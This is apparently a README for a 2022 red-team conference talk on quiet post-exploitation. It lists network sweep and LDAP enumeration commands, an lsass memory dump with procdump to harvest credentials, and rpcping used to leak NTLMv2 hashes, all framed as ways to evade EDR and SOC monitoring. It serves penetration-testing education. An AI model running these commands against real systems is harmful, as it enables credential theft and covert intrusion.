This repo is supplemental material for my presentation for Wild West Hackin Fest's Way West conference in San Diego in 2022.
- Discord
- Email me at [email protected]
Security Operations Centers and event monitoring have advanced by leaps and bounds in the past decade. While this is a good thing for cybersecurity as a whole, as red teamers and penetration testers, this means that Metasploit payloads and common tools simply won’t work. Any attempt to drop tools like Mimikatz or Responder will be contained by even the most basic of Antivirus and EDR. Want to kick off an Nmap scan and recon the network? Good luck with that!
This presentation focuses on ways to accomplish required tasks in a quiet manner. It will focus on performing network reconnaissance while emulating typical user behavior, performing the same tasks as common tools with alternative methods, obfuscating our code, and executing the same techniques as some of the worlds most advanced threat actors – all while staying quiet.
Everything in this discussion is based around post-exploitation scenarios, meaning that you have already landed on a machine, escalated privileges, and are looking to move throughout the network.
arp -a
ping -b x.x.x.255
1..254 | % {"192.168.1.$($_): $(Test-Connection -count 1 -comp 192.168.1.$($_) -quiet)"}
for i in \seq 1 255`; do ping -c 1 192.168.1.$i | tr \\n ' ' | awk '/1 received/ {print $2}'; done
ldapsearch -x -h x.x.x.x -b "DC=contoso,DC=com"
https://github.com/dirkjanm/ldapdomaindump
Be fancy and use it from Sysinternals Live
\\live.sysinternals.com\tools\procdump -ma lsass.exe OUTFILE.dmp
Or download procdump from https://docs.microsoft.com/en-us/sysinternals/ and do it same as above
rpcping
is a lolbin that will allow you to send an authenticated rpc ping to a remote host along with the current users NTLMv2 hash. Use it when you pop a shell, but don't know the compromised users password.
Check out the lolbas page on it
I've talk about this before in my presentation for Red Team Village. Check it out here
- Ippsec dumping LDAP with ldapsearch on HTB Forest machine
- Use ldapdomaindump to dump LDAP and lookup IPs
- Detecting Bloodhound
- Working with stunnel
- The classic Linux priv esc checklist from g0tmi1k
- Active Directory Recon Without Admin Rights probably not OPSEC safe
- SMB Enumeration Guide
- Active Directory Organizational Units